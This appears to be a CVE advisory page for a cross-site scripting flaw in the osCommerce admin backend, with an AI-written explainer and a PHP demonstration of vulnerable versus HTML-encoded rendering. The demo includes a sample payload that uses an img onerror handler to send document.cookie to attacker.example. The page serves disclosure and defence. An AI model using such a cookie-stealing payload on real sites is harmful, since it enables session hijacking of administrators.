osCommerce 4.12.56860 - Reflected Cross-Site Scripting (XSS)
Description
osCommerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability. An attacker can inject JavaScript through the "configuration_title1" parameter, potentially leading to unauthorized script execution in a user's web browser.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
osCommerce is vulnerable to XSS via the `configuration_title[1]` parameter, allowing an attacker with access to the admin backend to inject JavaScript. Note that the CVE title classifies the issue as reflected XSS, while the advisory narrative below describes stored behaviour (the value is saved and executes when it is later rendered); the page does not resolve this discrepancy.
Vulnerability
The osCommerce e-commerce platform is susceptible to a Stored Cross-Site Scripting (XSS) vulnerability affecting the /admin/modules/save?set=payment endpoint. An attacker can inject arbitrary JavaScript through the configuration title parameter, which the CVE description names `configuration_title1` and the advisory narrative names `configuration_title[1]` (the latter is how PHP receives an indexed form field). This issue exists in versions prior to the fix referenced in the advisory [1][2].
Exploitation
An attacker needs administrative access to the osCommerce backend to reach the vulnerable endpoint. The attacker submits a crafted value for the `configuration_title[1]` parameter containing a malicious script. The value is stored unchanged and, when the configuration is later rendered in an administrator's browser, the script executes [2]. Because administrative access is a precondition, the realistic attack paths are a compromised or malicious low-trust admin account, or a legitimate admin being lured into submitting the payload.
Impact
Successful exploitation results in arbitrary JavaScript execution in the context of an authenticated administrator's browser session. This can lead to session hijacking, defacement, or theft of sensitive administrative data [2].
Mitigation
The fix for this vulnerability is included in the latest version of osCommerce, available from the official website [1]. Administrators should upgrade to the patched version. Until then, restrict administrative access to trusted users. If a custom patch is required, HTML-encode the configuration title at the point where it is rendered; input validation on the parameter can be added as defence in depth, but on its own it does not reliably stop XSS, because a short title with no control characters can still carry markup [2].
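The following PHP fragment is an added illustration of the save-then-render pattern described in the Exploitation and Mitigation sections; it is not osCommerce code, and the function names, the table cell markup and the sample payload are all constructed for this example. It shows why output encoding is the fix and why a shape-based input check alone lets the payload through.

```php
<?php
// Added example, not osCommerce code. Demonstrates the stored-XSS pattern the
// advisory describes: an admin-supplied configuration title is saved and later
// echoed into the admin UI. All names here are hypothetical.

declare(strict_types=1);

// Constructed sample of what an attacker could submit as configuration_title[1].
// It has no control characters and is short, so it passes naive validation.
$submitted = [
    '1' => 'Credit Card <img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
];

// Stand-in for the configuration table the real application writes to.
$configurationStore = [];

// Vulnerable render: the stored value is emitted verbatim into HTML.
function renderTitleVulnerable(string $title): string
{
    return '<td class="dataTableContent">' . $title . '</td>';
}

// Hardened render: HTML-encode at output time. ENT_QUOTES also encodes single
// quotes, so the value is inert inside element content and quoted attributes.
function renderTitleSafe(string $title): string
{
    return '<td class="dataTableContent">'
        . htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8')
        . '</td>';
}

// Defence in depth on the way in: a configuration title is a short human label,
// so reject control characters and cap the length. This is a check on shape only;
// it deliberately does not try to filter markup, because that is unreliable.
function validateConfigurationTitle(string $title): bool
{
    return $title !== ''
        && mb_strlen($title, 'UTF-8') <= 128
        && preg_match('/[\x00-\x1F\x7F]/', $title) !== 1;
}

// Simulated save handler for set=payment: the value is stored unchanged,
// exactly as the advisory describes.
foreach ($submitted as $index => $title) {
    $configurationStore[$index] = $title;
}

// Simulated later page load in an administrator's browser.
foreach ($configurationStore as $index => $title) {
    echo "validates:  " . (validateConfigurationTitle($title) ? 'yes' : 'no') . PHP_EOL;
    echo "vulnerable: " . renderTitleVulnerable($title) . PHP_EOL;
    echo "hardened:   " . renderTitleSafe($title) . PHP_EOL;
}
```

Running it shows the payload passing `validateConfigurationTitle` while `renderTitleVulnerable` emits a live `<img onerror=...>` element; `renderTitleSafe` emits the same bytes as encoded text (`&lt;img src=x onerror=&quot;...`), which the browser displays rather than executes. The encoding must happen in every place the title is rendered, not only on this one page.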
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
osCommerce / osCommerce v5, affected range: 4.12.56860
Patches
No patches discovered yet.
References